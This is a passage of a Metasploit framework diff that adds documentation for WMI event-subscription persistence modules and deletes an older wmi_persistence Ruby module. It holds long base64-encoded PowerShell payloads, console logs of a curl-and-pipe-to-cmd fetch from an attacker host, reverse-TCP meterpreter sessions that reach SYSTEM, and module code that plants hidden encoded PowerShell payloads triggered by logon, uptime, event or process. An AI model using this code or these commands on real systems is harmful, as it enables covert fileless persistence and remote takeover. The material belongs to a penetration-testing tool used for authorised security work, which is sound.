vAEMAMABwAEoANAA3ADEAewAyAH0AZABqADUANQBNACsASQA3AHgAdgBXAEYAYwA0AGMAWgAzADIAWgBwAG0AZgB0AGMAOABNADMARwBUAGQAYwBlAEQANwBPAFgAMQBaADkAWAByAGYANgBKAFUARgAvAGkAaABPAHgALwBDAFcANAAnACsAJwB2AGkAewAxAH0AUABR
AFAAegBFAC8AVwByAHUAaABVAE8AaAByAGIAYgArAFAAMABFAGIANgB5AE0ASQAvAE8ANgA4AFMANgBlAGUASQBJADMARgAvAEIAcABDAFUAKwBqAGUAOAB7ADEAfQBUAGQAbQAvAHsAMgB9ADIAdwA3ADcAWABkACcAKwAnAEgAWABkAEIAJwArACcAWAAvAFgAUgB1AHYAJwArACcANABGAEQAOQBkAHsAMQB9AFAAZgB5AHIANABkADcAeQB0ACsAdQA1AHEAKwAwADYASQArADcAcAByADQAZABjAEMATAA3AEQAcgBGAFgAKwBWAHoAUQBEADAASgBaAHkAWAB4AFcASQBGAEwAMwBZAHMAUABqAG8AbQBqADgAcgB7ADIAfQB7ADIAfQBMAHoAdAAwAEYAKwAnACsAJwB1AHsAMgB9AHAANABTAGIASwAzAGgATAB1AEQAQgB1AHcASgBkADUATQB4AEgASAB7ADEAfQA2ADcAYwA1ADEAUgBuAEYALwBTAEYAegBEAHUATwAyAHkAZgB3AGMAJwArACcAMgBYACsAdQA4AGYAZgBRADEAeABhAFQAVgA4AC8ANABHAEIASgBQAFIANwAyAFgAYwBJAGIAVwB0AGUAOABMAGwAeQB0AFgARwBjAEwAKwB2AEMAeAA5AFkAYgB6AFcAZQBGAG4AaQAzAFgARgBXAHoALwB4AGMANABGAE8AeQBMAHIAegBLAC8AWgBJAFoAeAB4AFoAcAB6AGwAdgA5ADEAdwBYADQARgBQADkALwA3AEQAdgBNAGYAaABTAEgAWgAxAG0ASABaAGoAMQB6AGMAegA2ADAAMwAzADYAMQBMAHcAYgB1AFUANgBHADEARgBuAGIALwByAHkAUQByAHkAdQB2ADMANgBkAE8AcgA2ADEATAB5AEYAUABYACsALwA0AGsAcgAzAFAAMABiAGUANgBMAGwAKwBSAGIAdgBIAG0AZAA5ADgAMwA4AE4ASQBaAEgAZQB1ADQAdgA1AHQAMQB0AGsAbAAvAGsAbwA4AHAAOABMAFgALwBNAFQAOAByAHoATgAnACsAJwAvAGYAOQBPAHQAZQBWADgAVQBuAC8AbwAwACsAcgBmAHEAYgBVAFkAYwA4ADYAcAB7ADEAfQB2AGYAagB0AGgASAA5AGkAKwBzADEALwByAEUAcQBlAFoAKwB7ADIAfQBGACsASwBoAC8AVgBjAG0AMwByAE8AYwBiAFMAZQBVAFAAeABjAHgANAByAGYARgBQAHMAVQByAHcAbAA4ADMAYQBaAGYAbwBPAE4AcgA4AEQAQgB5AEgATgBEAEwAdQB1AGIAKwBUAG4AOQBRAGYAdAAvADAAUwBJAEsAdgBYAHMASAA1AEMAUAB5AFUANgBHAFQANgByAHUAMQA2AGEAWABqAC8AagB2AFcATgBKAC8AdwBuAGoAcgAxAEgANgB2AGkAZgA0AEcAWQBFADcAcABXAFAANQBYAHUAZQBEAG4AagA2AHsAMQB9AGIANABXADgARQBYAEcAOAB4AGYAegBiAEoAWABqAHQAMwBOAGYAcQB2AEIAagBoAHQAMwBLADEAdwBYADcAWABEAEkALwBIAE8AcQA4AEUAMwBsAHUAawBIADQAZQB7ADIAfQBPAE4ATwBhAHUAWQBCADkAYQB2AG0AWAByAHgALwB4AGIANABMADkANwBYAC8ANABhAHYAUABmADgAMwBmAG8AcwA1ADgAcwBVAFkASAA5AE8ARABSADQAcQB6AFIATAB6AC8AQgB4AGQAeAA5AHcAdQAvAHQANgBRADkAYgB6AHcAbQB6AFAAUABkAGsALwBUAEkAagBUAHAAawB2AEgAYQBlAFgAWABFAGYAawBFAHoAdgB7ADIAfQBDAC8AUwBHAC8ASgBVAGYAWABsADkAMQB2AFEATwB2AFgAQwB2AHEAeABQAGkAZABzAHQANgAwAGsAbgAzAFcANgBl
AG8ARABCADMAKwBWAEQANgAxAHIAMwBsAHEAaABaAC8AVwBkADUANwBjAGMAdgB3AGYAMgBXAFYAbwB2AG0AaQAvAHUANABMAFYAdAB3ADYAdQBlAGgAOQBEAFoAQwBYADEAVwBTADAAOQBsADMASABqAE8AVQBMADEAdQBqAFYALwAwAGEATwBSADUAdwBQAFgAcgB2AEoANQA0AFQAdQBHADUANgBuAHgAdABYAFYAegAnACsAJwBDAGkAegBYAHIAYQA5ACsAUgBlAFEAegA5AGQAdQBHADgAWAA1AEsAMwBaAFcAUwBlAFgANQB0AGYAdwBTAFAANgBvAGsASgBQADMATwBiAG4AeABDAFcASQBvAC8AbAAnACsAJwAzAGwASABLAGYAbgBOAFMANQByADYANwBSAGoALwBKAHYANwBMAHEANwBKADQAOQBmAHEAZgBlAFoAYwBUAGwARABKAHoAMABRAGoAMgB2ADYAaQBOADcAYgBOAHYAVwBsAC8AVAB2AFcAQgBlAGEAbAAvAFIAdQBQAEsAaQA0AG4AUABNADkANQBiAHUAWQBSAHgAVwBPAEkAJwArACcAZgBzAHgAMQBjAGMATgAzAFYANQA2AEgAbgBaAGMARgB1AGkAbwAxAC8AaQBiAFgAYgBTAHYAUABPAGEANABYADQAUgAwAGQAbABOAHsAMQB9AHIAcAA3AG4AdgA1AGoAbQBzAE4AdAA5AFgANABrAHYANQBaAFQAMwBhAHQAYwA1AHgAZgAwAG0AMgBHADEAeQBEAFIALwBWAHQAZQBNAEoAegBHADMAagByAG8AMwBPAFAAYwAxADcAcABwADUANQAzAHoAUAB0AFgANgBDAE8AdABQADgATgBPADUAewAyAH0AdgB3AFUAYgBvAE8ANwArAHsAMQB9AEwANgA1AEQATwBJAE8AdABjAHIAYgB0AHkAWAAyAEkATwAxADMAdQA2AG4AOABNAFgAMQBHAFYAUwBYAGUAcgAvAGwAZgBzAEUAOAAyADIAZQAwAHkAZgBwACcAKwAnAGIAYgA0ADgAOAAvAHoAdAB1AFQAWQBSAG4ANQAvAEcAVgBVAGkALwAwAC8ALwBRAFEAZgBRAGgANgAxAGIAMABzAGUAcQByADYAMwBoAGUARQB4AGYAWgBkAGEAagB2AGUALwBLADQAWQBhADQAUQBMAHkAKwBaAGsAegBxAGUASQA2AHgAYgBsAHUAbQB0AHIAcAA3AGgANgBUAEgANQA3AHoASQBuAE4ALwB2AEQAcwAzAHAAUAAvAFAATwB0AHEAZAA5AFgAZABOAE0AVgA4AHkAagA0AHgARgA3AHQAcwA0ADQAYwBGAC8ATwBYAC8AQgB7ADIAfQAzADUAeABCACcAKwAnAC8ANgBVAGMAVABuAHEAKwBaAGEAMQBXAGYANgB7ADIAfQBQAEcAMABjAFQAcgBWAFQAbQArAFgAZABmAFQATABmAFUAMgBKADgALwBLAHgAMgBXAGQANQA3AHgARABIACcAKwAnADkAdABZACcAKwAnAEYAegBGADMAWgBsADIAWAArADgAWgA1ADEAaQBIAFkAYQBaADIAMQBvAGQANQBLADgATABDAEcAdAAzAE4ALwBzAGQANABkAG8AWQB1ADEANwBoAGEAZAAwAGYAWgAnACsAJwA1AHgAYgB1AGUAOQAzAGsASgBPAHMASAA0ACsAYwBaADEAeAAvADIAaAA3AHEAawB6ADgATgBIAHoALwBOAGYASwBlAGkANwAzACsAUQBIADYARQBIADEATwB2ADkAQgAxAHsAMQB9AHcANAA3ADcAJwArACcANwBwADUAWQB4ADEAMABEADcANQBTADEAcQBWADYAWAByAHAAdgBkAEYAbABuADUALwB7ADIAfQB6ADEAMwBMADEAKwBVAGoATAA4AFUATABmAG8AbAB2AFIAMAA1AHgAagB3AEMALwBDAG4AZgBy
AEYAaQBLAHYAbgBQAGQAWABoAHoAdgAzAG0AWABhACsAcwBtAC8ATwBKAE0AZgBwAGQALwBVAEIANAArAFcASgBkADAAOABSAHgAaAB0ADYARABYAHcATgA5AHUATQBrADYAcQArAE4AMQA3AHIAaABlAG8AaQB2AFIAUgA0ADcAegBqAEgAbQBtAGYAdQB1AGYANgBHAHoANABIADkAMABCAHYAdABHAEQAOABFADcAUABmAGQAYgAxAE0AcQBKAGUARAAzAEYAVABQAEoATAA3AFkAbwBDAFQASAA4AHkALwBhACsASwBmADUANQB7ADIAfQBhAC8AaABsADUAegBoAGgAJwArACcAUQBoACsAOQA5AHEANwBSAE8AKwArAEcANAB3AHsAMQB9ACsAOQBSAGMANABqADUAegBQAHcAQgBuAE8ALwB6ACcAKwAnADcAbgAyADUATwAwAEcATwB4AGYAcwAyADAAbAA1AEQAcgB1AHcARABoAHoAbAAnACsAJwBPAGwARQA4AEYAWQBlAGwANQA5AC8AcQBMAFMAOQBEADQAMgBPAEIALwB0AHoAegAzAHIAegAnACsAJwBPAC8AVwA1AFoAWgBWADIAMgBSAFMAKwBWAFAAbwBkADUAeQBYADAAYwB2AFoAMwB7ADEAJwArACcAfQBhAGMAdAA4AFIAMwA5AFQAdgBzAHcAcgBXAFUAOQA5AHkAZgBsAGsAUABqAHMAbgBUAHAANQByAHQAcAB3ADcAYwBXADcAQgAvAE4AQgBwADUAdABVAGUAYwA2AGgANABRAGYAYQBQAG0ATgA4ADUAVAAzAHIASAA0AHkAMwA2AFUARAB6ADcAKwBoAGIASABOAG4AbwBuADgANABOADEAUwBqADcAZgBNAGYANQBXADkARwBuAE8AVABkAEMARABQAGMAOAA3AFIAKwBUAEgANQA0AFAAWgBIADUAKwAvAHUAUAA1AEsAbgB3AGUAOQB7ADIAfQB7ADEAfQBmAHAAcQAwAGYAMwBUADgAOQBuAG4ASwBlAEUAZABlADIAbQB5AHUAYwBuADEAcQBsAHQAegAxAE4AUAA4AEwALwB5ADYAdgBNAHsAMQB9ADIAZAAwADMAMwBzAEYAZgAyAC8AcgBhADUAMgAwAGoANQBoADMAbQBNAHAAOQAzADIASgA1AGoAbgAyAC8ANQBuAEcAawB7ADEAfQBqAG8ANwA0AGIAewAyAH0AUgBmADUAUABQAEwAcAB5AGEAdQBOAFgARgBiADAAYwBlAEUAOAA2AGwAMQBXADAAVgBlAEYALwB7ADIAfQAzAHMAYwA0ADAAdgA3AGoATwAzAEQAZQB0AFEALwBRAGUAZQBEAFEATwBOADEAawAvAGMAawA2AFYATQBqADYAeQB2AG4ANQBzAHoAcgBjAFcAbQBiAGQATAA4ACsAbgBuAGYASwA0AFYAbgBxAHMAWAA5AEgALwA0AG0ASABPAFcAUABJADkANgBiAGwAQwBmAG0AcgB0AHYAUgBqADQAWABtAE8AQgAzADIAZgBCAGoAeAAvAFAATgBHAGUAYwBuAG8ANQBUAFAAawBkAGIAdwBpACsASwBUAHEAcQB4AEgAVgBIADgAUAAyAEQAMQB2AHoAaABzADkAegA3AGMAZABCADgALwBCACsAYgB5AGoAbQBXAC8AJwArACcAZgA4AHIAegBQAGMAeQBCADkATgBHAFgALwByAEYATwBaAGoAegB4AG4AegB2AEkANQBRAGUAbgA0AHYAeABDAG4AbgBYAFYAawBuADcAaABlAE4ALwAwADEAOQAyAFAATwAyAFkAUwBIAHsAMQB9ADkANwBYACsASgBIAGoALwAvAEsAdQBEAHkAUAB6AGkAZQBmAGsAdwB2AHIAMQA4AFAANABxAG0AcgBtAFYAdQBTAGkAZgBoAC8AcgA4AGMASQB5AGUARQBlADQAdgByAGMATQBlAHcAYQBI
ADEAYQBlAEkAOABxAEQAVABQADEAUABDAE0AMQB2AGsAZQBGADYAMwBjAEIAOQBxACsAZgAyAFQAZABaAEYANgBvADYAUQBzADkAKwA1ADEANABiADgALwAxAE0AVABxAFAAOABPAGkAWgA1ADEAZgB5AEoAYgA2ADQAbwBvACsAagBwADYAcQBpAFQAYgB6AFgANQBvADAAKwBkAHIAMAAyADUAMgBkAFAAMgBQAFAALwBuAGsAOQA5AHQAVAA3AGIAUgBsAHQANABkAFoAKwBZAEUAYQA4AG4AOQBqAEYAUABVAHcALwAnACsAJwB3AFQATABaAEgAZABwADAAUwA1AHgAdAB3AG4ATQAvAHQAegB2AE4AOABwAEgAVQB1ADQAMgB7ADEAfQAzAHoAdwBmAEUAUwAvAEUATgAvAEwAbwBGAGgAeQB2AHEAcgAvAFEANQA5AGgAewAxAH0AZQBrAGYAKwAvAFIAdgB6ACsAKwA0AGQAZgAvAHYAJwArACcAWgBoADkAcgBoADcAKwBQAEMAUAAvAHcATABZAHEAUABCAHkATwBSAHsAMgB9AHsAMQB9AHsAMQB9AHsAMQB9AHsAMAB9AHsAMAB9ACcAKQAtAGYAJwA9ACcALAAnAEEAJwAsACcAZwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None +[+] Payload successfully staged. +[+] Final command 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 +[+] EXECUTING: +powershell.exe -EncodedCommand 
JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBDAEYALwA0AHEASABEAFYAZABLAFQAOQBIAEIANgBGAEoAYQAxAEMAWABDAHIASQBOAEUAcQBBADIAMQBxAGIATQB4AHUANABpAFIALwBmAGQAVwBLAHUAewAwAH0AWQBuAEIANwB6AEgAdAA5ADcAUwBZAGkAMQBJACcAKwAnAEkAawBWAG8ARAA3ADQALwBnAEwAMAB6ADIATwBYAGsAawBpAHoARQBoAFMAMwBZAHcAVgBrAE8AMQA0AEIAZAA5AFYARwBVAEUASwAnACsAJwB1ADMAVQBpAFQAdwBMAE4AMQBpAFYAYQBiAGsAUABiAFkAJwArACcAUgBwAEsAMAB1ADgANgB1AHgAbQB0ADcARAAxAFkARwAvAFUAbgB5AEQANQAyAHoANAB7ADEAfQBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 6416 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Persistence installed! +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.2931/WIN10PROLICENSE_20251122.2931.rc +``` + +Persistence Execution + +``` +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > execute -f calc.exe +Process 7596 created. 
+meterpreter >
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49759) at 2025-11-22 11:30:10 -0500
+
+meterpreter > background
+[*] Backgrounding session 1...
+smsf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 2...
+msf exploit(windows/persistence/wmi/wmi_event_subscription_process) >
+```
diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md
new file mode 100644
index 0000000000000..48c2bd217ac81
--- /dev/null
+++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_uptime.md
@@ -0,0 +1,134 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that +will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_uptime` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### SYSTEM_UPTIME_START + +System uptime to start the trigger (In seconds). Default: `240` (4min) + +### SYSTEM_UPTIME_END + +System uptime to end the trigger (In seconds). Default: `325` (5min 25sec) + +### CLASSNAME + +WMI event class name. 
Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49703) at 2025-11-22 08:35:55 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). 
+Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_uptime +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > [*] Installing Persistence... +[*] Powershell command length: 6727 +[-] Compressed size: 14260 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14260 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] - Bytes remaining: 6260 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Payload successfully staged. +[+] Final command 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 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Cleaning up 5896 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Persistence installed! 
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.3630/WIN10PROLICENSE_20251122.3630.rc +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49706) at 2025-11-22 08:39:07 -0500 +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49707) at 2025-11-22 08:40:06 -0500 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb deleted file mode 100644 index da45657a5ca85..0000000000000 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ /dev/null 
@@ -1,230 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Local - Rank = NormalRanking - - include Msf::Post::Windows::Powershell - include Msf::Exploit::Powershell - include Post::Windows::Priv - include Msf::Post::File - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'WMI Event Subscription Persistence', - 'Description' => %q{ - This module will create a permanent WMI event subscription to achieve file-less persistence using one - of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER - (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing - must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon - /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. - The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON - method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS - method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command - (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is - activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a - high integrity process. 
It is also recommended not to use stageless payloads due to powershell script length limitations. - }, - 'Author' => ['Nick Tyrer <@NickTyrer>'], - 'License' => MSF_LICENSE, - 'Privileged' => true, - 'Platform' => 'win', - 'SessionTypes' => ['meterpreter'], - 'Targets' => [['Windows', {}]], - 'DisclosureDate' => '2017-06-06', - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'DisablePayloadHandler' => true - }, - 'References' => [ - ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], - ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'] - ], - 'Notes' => { - 'Reliability' => UNKNOWN_RELIABILITY, - 'Stability' => UNKNOWN_STABILITY, - 'SideEffects' => UNKNOWN_SIDE_EFFECTS - } - ) - ) - - register_options([ - OptEnum.new('PERSISTENCE_METHOD', - [true, 'Method to trigger the payload.', 'EVENT', ['EVENT', 'INTERVAL', 'LOGON', 'PROCESS', 'WAITFOR']]), - OptInt.new('EVENT_ID_TRIGGER', - [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]), - OptString.new('USERNAME_TRIGGER', - [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]), - OptString.new('PROCESS_TRIGGER', - [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]), - OptString.new('WAITFOR_TRIGGER', - [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]), - OptInt.new('CALLBACK_INTERVAL', - [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]), - OptString.new('CLASSNAME', - [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) - ]) - - register_advanced_options( - [ - OptString.new('CUSTOM_PS_COMMAND', - [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]), - ] - ) - end - - def exploit - unless have_powershell? 
- print_error("This module requires powershell to run") - return - end - - unless is_admin? - print_error("This module requires admin privs to run") - return - end - - unless is_high_integrity? - print_error("This module requires UAC to be bypassed first") - return - end - - if is_system? - print_error("This module cannot run as System") - return - end - - host = session.session_host - print_status('Installing Persistence...') - - case datastore['PERSISTENCE_METHOD'] - when 'LOGON' - psh_exec(subscription_logon) - print_good "Persistence installed!" - remove_persistence - when 'INTERVAL' - psh_exec(subscription_interval) - print_good "Persistence installed!" - remove_persistence - when 'EVENT' - psh_exec(subscription_event) - print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U " + datastore['USERNAME_TRIGGER'] + " \"" - remove_persistence - when 'PROCESS' - psh_exec(subscription_process) - print_good "Persistence installed!" - remove_persistence - when 'WAITFOR' - psh_exec(subscription_waitfor) - print_good "Persistence installed! 
Call a shell using \"waitfor.exe /S #{host} /SI " + datastore['WAITFOR_TRIGGER'] + "\"" - remove_persistence - end - end - - def build_payload - if datastore['CUSTOM_PS_COMMAND'] - script_in = datastore['CUSTOM_PS_COMMAND'] - compressed_script = compress_script(script_in, eof = nil) - encoded_script = encode_script(compressed_script, eof = nil) - generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) - else - cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) - end - end - - def subscription_logon - command = build_payload - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_interval - command = build_payload - class_name = datastore['CLASSNAME'] - callback_interval = datastore['CALLBACK_INTERVAL'] - <<-HEREDOC - $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"} - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 
'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_event - command = build_payload - event_id = datastore['EVENT_ID_TRIGGER'] - username = datastore['USERNAME_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_process - command = build_payload - class_name = datastore['CLASSNAME'] - process_name = 